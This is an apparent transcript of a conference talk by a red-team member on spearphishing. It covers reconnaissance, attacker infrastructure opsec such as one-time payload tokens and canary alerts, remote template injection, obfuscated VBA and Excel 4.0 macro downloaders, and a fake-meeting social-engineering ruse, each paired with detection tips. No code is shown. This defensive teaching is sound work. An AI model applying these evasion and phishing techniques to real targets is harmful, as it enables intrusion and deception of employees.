 So it turns out that you are all in for a great treat so I was actually having a conversation with Jesse a little while ago I'm getting ready to introduce him and I was amazed to learn that he is a former astronaut which is pretty amazing seven years on the International Space Station he actually got bored of it so now he leads a red team and if you believe all that he's got a lot to tell us about the spearfishing experience right so he's gonna tell us about the real world trial and errors that he made building and running a red team and also why to do things in a very offset safe way and how to get a foothold with spearfishing so and of course in the in the access tradition we're gonna start off with the way we did there you know to our comrades shout of vodka cheers good luck everyone so my talk is called purple haze the spearfishing experience futuring me so just a little bit about me if you if we never met before my name is Jesse Nebling I'm on an internal red team a former consultant I was consulting for about seven years before I joined this team this year it's not a big four consulting firm or accounting firm not allowed to say the name right now but I'm based out of Seattle Washington I'm mostly focused on Windows exploitation purple team advocate really just I'm in for the collaboration between red teams and blue teams because that's really how we all get better right on the side I do some music production electronic music play guitar in a punk band free parking check them out they're cool and I'm just stoked to be here overall so during this I just want you to think and take this to heart during a red team operation treat the attackers like a real adversary I think that's important that's how you're gonna learn to figure out how to detect certain things figure out how to respond to it properly if you if you're not doing that you're not gonna get much value from the red team and then afterwards make sure you have collaboration so what's the point of my talk I'm gonna walk through some of the trial and error I've had as a red teamer and also what blue teams have done when I was consulting and now the blue team I work with directly pinpoint some areas that hopefully will help some of you think a little bit differently from an attacker's mindset tight security and potentially help you foster some new detection controls and just give you the blue teamers in the room a glimpse of how adversaries think and how we're plotting against you so overall I'm just gonna go over recon some adversarial upset that we put in place to figure out if the blue team is catching on to what we're doing and also dive into malicious attachments some old stuff some new stuff hopefully you guys learn something from it so first with recon you know we look to see what's publicly out there who is subdomain all that jazz everyone knows that and then we start trying to craft our spearfishing campaigns looking for things like job openings that have the technologies that your business is using looking up social media to see if you know your employees are saying what tools that you have in your environment anything that we can really pull together to understand what your tech stack is and also potentially craft a campaign to go against you also we look for things like services that might be available and we could potentially look for things that like maybe single off on your external environment so we could attack that later and I think the last bullet point is big one I'm gonna show you a screenshot next in the next slide but bouncing emails off the domains you can pull a bunch of good information from that really what we're using all of this for the firewall rules looking for the things and who is in your public environment we will create firewall rules for our C2 servers so we could potentially narrow the scope if you have a third-party sandbox or something like that it won't be able to pull our payloads and actually run their sandboxing against it and so on looking for those single factor off entry points looking for anything that is actually environmentally unique to your environment so we can key in on that and craft our payloads further so the left image hopefully you can see it but that's bouncing an email off of some random company might be a real company I don't know but they actually have the internal domain name readily available this is more for if you have SMTP servers like on-prem cloud services prevent a lot of this and then you can also see at the bottom it says pphosted.com so that also gives me the knowledge that your corporation or your business is using proof point so that'll help me craft how I'm gonna attack you through through attachments or whatever it is the other one is a pretty old technique but it's still viable I've used it a ton of times when I was consulting looking for MS link or if you're still using link for some reason or Skype for business you can basically send an NTLM authentication request to that server and pull back base64 encoded blob that basically has all of your internal domain information and also the internal server name I have some references hopefully the slides will get out sometimes soon that you guys can click that and look through it more so some potential areas of detection for this anyone that's you know mass downloading externally hosted files to pull metadata to see what versions your software is within office or Adobe or anything like that so we can craft things against that emails potentially being bounced against non-existent email accounts that's what I showed in that one image this is a lot harder if you if your business has a lot of clients but if you know you can potentially whitelist specific domains and you can crack down on that a little bit more for maybe a smaller business and then you know just brute forcing against single factor auth that that's pretty easily detected a lot of people still don't detect on that though I put in a couple points that I've had I've struggled with when I was doing these assessments you know it costs more time to the attacker overall if I can't figure out what your egress points are from your network from the publicly available stuff anything that's registered under your company's name if you have a third party or like your internet service provider is what's pulled from from that recon then I'm not going to be able to change the firewall rules to narrow down on on what can access my payloads if your environment has multi factor all over the place it's going to be much harder for me to spray anything I usually try not to do that anyway because it's too noisy but you know some people do if employees only have general job descriptions basically anything that's not related to your tech stack then that's going to make it harder for me to figure out what's in your environment so I can further do some tests and against those tools and potentially get by them and then the last one wildcard emails aren't allowed so I can't bounce off or you have like a cloud service for your email you won't be able to pull that internal domain information from those I made a toolkit for looking up some basic recon for networking you can follow that if if you like so the next one I'm running into adversarial opsec testing dropper malware this is a topic on its own I'm not going to cover it too much today but just know that an adversary with that's dedicated enough will download free trials of AV get trials of your EDR products and figure out ways around it you just have to kind of assume that in your environment and look for anomalies but that's just something that you need to keep in mind and if you want to talk about this afterwards I'm happy to not going to cover it with this talk so this is one technique that I've done and I've figured out was worked pretty well to figure out if incident response or the blue team was onto my campaign I would set up basically a web server that is not related to any of my other other C2 infrastructure and whatever payload I'm sending will basically send a benign web request to like an image or something like that once that image gets pulled or gets requested then I'll get a text message this works twofold because basically I'll get a text message one if the actual victim has clicked my link and I know that I'm about to get a shell or two if there's multiple requests happening I'm getting a ton of text messages I'm like oh shit the blue team's probably on me let me burn down that infrastructure and start somewhere else I've also seen some people do UNC path injection and pull until MV2 hashes over the internet if you have a SMB outbound I'm gonna you probably shouldn't but you I've seen it like 50% of the clients that I worked at so I just have some sample code for the text messages for the red teamers in the room and then under that for the blue teamers in the room I actually have the user agents that office products use it might be helpful for people that are sandboxing the payloads or any any of the documents that they're receiving or if they think something is malicious you could potentially use this in tune your sandbox a little bit more this is another technique that I came up with basically using one-time use tokens so whenever your payloads if you're staging request out to a server that you know I own there's a database set up that will have all the usages of that token if the token gets requested one time from my payload then it will actually serve up the legit payload and start the process of downloading and executing whatever the flow is if there is more than once you can set however many times you want it to work but if it the token gets requested more than once then potentially that is probably a blue team so that will redirect to something benign and then you won't be able the incident response teams won't be able to actually pull that down also don't request my payloads with W get that's just going to get redirected I've seen it a lot it's just something that I need to point out so some areas of potential detection there office any document reading process that has outbound connectivity you know this is kind of a no-brainer but if some people are new that it might be good information any type of outbound network connectivity should be looked at further there's a chance it's not malicious a better chance it probably is any malicious links from non-trusted domains obviously that's a much harder one to crack down on if you have a big environment those user agents that I called out earlier and then this one it's kind of counterintuitive to the first bullet for my incident response and defense tips but if there's one of those campaigns that's more mass fishing that is has the tokens that are being used and you want to pull that payload you could potentially look for those unread emails click that link download the payload and analyze it that way and that kind of goes into the next tip which is don't do that you're better off just pulling the payload from one of the users that already clicked it and analyzing it that way and that kind of goes and coincides with that W get request I was talking about earlier this one is just kind of an overarching one you guys probably hate hearing it but just assume the adversary knows how to get around your tools look for things after you know you're gonna get low hanging fruit and unexperienced attackers but look for things like you know that guy in finance opening up PowerShell and executing commands because that's obviously going to be something that shouldn't happen or wouldn't happen normally and then the last one I kind of touched on it disable your SMB outbound traffic that's ridiculous so some malicious attachments you know there's email security and sandboxing services out there that you can rely on you can hold on it as a crutch but I wouldn't make that you know it's not a silver bullet by any means you can modify some publicly known payloads pretty easily and get by them and I'm gonna run through a couple things that we do as red teamers so one this is kind of an older tactic but it still works wonderfully so I want to make sure that everyone is aware of it it's called remote template injection so the idea behind it is you have a normal non-malicious document and it actually calls out to an office template that is hosted on a staging server elsewhere so basically that template has the malicious code in it so once the document is opened it pulls the template down and then there's a macro in the document I kind of wrote the steps for the red teamers if they're curious about doing it you just edit a XML file but for the blue teamers in the room this basically it allows doc x files which typically don't have macros in them to be used as a malicious document so that will get by you know quite a few email filters the other side of this is when this actually occurs you can take the template down it depends if you have the firewall rules in place but if you don't you can take the template down while the email sandbox is doing its thing against the document and basically once it's making those requests out you'll see that there's like third-party sandboxes in like Azure or AWS requesting a ton of times to your server looking for the template once that dies down it's usually between five and 20 minutes you can just rehost the template because the sandbox will send that document to the user the victim whoever you're targeting and they'll open it and hopefully by that time you have the template back up and it'll just pull the template down and you get that malicious code execution there's some actually pretty unique indicators for this for the templates being requested by office products and I just put those there for the blue teamers as reference these slides will be up later but it's a pretty unique set of requests that gets sent out once it's pulling those templates this is you know the try and true method everyone knows about VBA macros it's gone through a million iterations it's gone to the point where you kind of have to hide in plain sight windows defender is catching on to basically everything and I assume that the other AV vendors are gonna catch up eventually but things like WMI execution is old-school PowerShell cradles that'll get caught most likely hiding variables and document properties XML data and then I just came up with a method of actually hiding code in alternative text of images and then the week I was about to execute Microsoft put in a new alert that actually says that it's an off you skated macro so you can't do that anymore but there's a really good talk on this at Derby con I think last year 2018 where they they talk a lot more about this and it's definitely a good one to view for blue teamers but basically we're doing things like reversing strings just replacing characters hiding it just straight in the normal macro instead of pulling different properties of the documents staging the payloads you know you don't want to put all of your malicious code in the payload because if that gets caught then your C2 infrastructure is burned so having that outside that next step is a good way to kind of thwart some of burning the infrastructure you set up and took so long to do and then just executing outside of office ancestry this is really it's a pretty well known way to do things in EDR tools nowadays all detect on if you're executing as a child process of like an office product but as an attacker we always have to execute outside of office and I put an example up of just that hiding in plain site macro for the blue teamers so if you're analyzing something you can see what is actually occurring here I cut out the execution side because that's all public knowledge so this one is actually something that I came up with as well but it was based off of a talk by Stan Hect at Derby con 2018 this Excel 4.0 macros for those of you that don't know is an old language within Excel that it basically allows you to hook Windows APIs and just call DLLs directly through Excel so it it's pretty awesome the method that he showed off was really more around doing direct shellcode injection but I didn't like that that much because unless you change your shellcode to execute outside of the office product it'll execute as a child process of Excel which will get caught by an EDR product so I wanted to do something different and also you know everything there will give away your C2 infrastructure if that's the case so I came up with my own attack flow I used Excel 4.0 as a downloader basically just calling the Windows DLL URL mon to download a file and then you can hybrid it and actually call a VBA function as well through Excel 4.0 so you can do that for execution since in the VBA it's it doesn't say auto open it'll get by a lot of email filters their email filters aren't really looking for these Excel 4.0 macros yet I also included some of the the user agents that get requested when this occurs just so you guys also know what's going on and have something to write off of if you if you can tune your sandboxes so some points of discovery the first one's obvious hopefully everyone knows that if a document has making outbound network connectivity then there's probably an issue that probably doesn't happen but sometimes does but it's something to look into at least VBA scripts run from documents you know EDR tools nowadays they they look into these at least you can flag on them with with a basic setup but again if it's not like your accounting guy that is running macros all day then there's probably some issue going on some malicious activity executing as a child process of office products if that ever occurs and you don't have an EDR solution then look into that that probably shouldn't be happening either any old format versions of office documents so dot doc dot XLS you can actually prevent those from even being opened in your environment through GPO so that's an approach you could take if you don't have like legacy documents which you know let's let's get to the 21st century now and then the last one I think is probably the the biggest one looking for these functions specifically within the macros the first ones is shellcom so you can call that CLCID and basically execute as a child process of Explorer instead of instead of the office document itself the rest of them are basically used as downloaders or other ways of execution the one that I really wanted to point out was the active sheet of visible equals false I use this all the time in phishing campaigns because it's how I sway users to click something basically what that is doing is making an image invisible so I'll just overlay an image on a document that says hey this is in privacy mode this isn't protected mode enable content to view the actual document so that will make somebody that's not too experienced just click enable content the image disappears it looks legit they don't really know what's going on so that's definitely a bigger one that I haven't seen too many people call out and then the other two are just really around the hiding in plain sight aspect of things so for the incident response tip here sandboxing a payload on a system that is actually representative of your domain because we did all that recon in the first place so we potentially know your internal domain name if it's just a third-party sandbox service there's a chance that it's not connected to your domain and if it's not then we'll just cut execution right there and not do anything malicious so that's a pretty important step I see a lot of people fail doing that but it's something that you can you can at least be cognizant of moving forward and then the last one this is a really well-known tool OLE dump if you don't know that you should probably look into it it's a really good blue teaming tool that you can scrape VBA macros and they also just made a plug-in for Excel 4.0 macros to see what's actually being executed and you can scrape that content and actually do an analysis against it to see if it's malicious and I just linked the did your Stevens tool the OLE dump at the bottom so this last one is pretty new there's a there's a talk on this tomorrow so hopefully he goes in more detail I'm gonna be brief about it though the the overall concept here is you can send a meeting event to somebody and it'll just pop up on their calendar this was pretty there's there's some big news about it recently with with scammers doing it I took it kind of the next level and did it more as an adversary where I would just attach like a Webex meeting and then say hey you need a an automated update didn't get pushed to your box and we need to do a manual update on your system they would join the Webex and you just talk them through giving you mouse and keyboard control download the payload say hey you're updated open up the office product or whatever and say oh yeah the version looks like it's up to date you're good to go if you have any questions go to your local IT desk so that works really well and it's it's kind of a something that hasn't really been done or I've seen talked about too much but I've popped shells that way there's a lot more scammers doing it with just like random links to something malicious that say you want a free iPhone but just ignore that so some points of discovery for that are again meeting meetings originating from non-trusted domains this is gonna be much harder for bigger organizations but if you know your client base you could potentially flag on that the other one is any meetings that appear without an actual email invite that's an indicator honestly I don't know a way to go in and look at that as a red teamer but it's something to think about and potentially look at as blue teamers and then as a tip just get the business to disable automatic adding of invitations to calendars because that'll make sure that they don't get that notification pop up that oh I have a meeting in 10 minutes I have to make sure I join this that that's really the only tip I have right now hopefully tomorrow at the collision talk he talks a little bit more about it but yeah so that's it for me this is actually my first contact so thank you so much for your time I appreciate it and we if you want to talk a little bit more afterwards meet me at the bar sorry if I spoiled your upset by saying where you are working for the past seven years space station thanks very much and we're gonna be outside for some Q&A and I think we have a break now as some red team people check in so thank you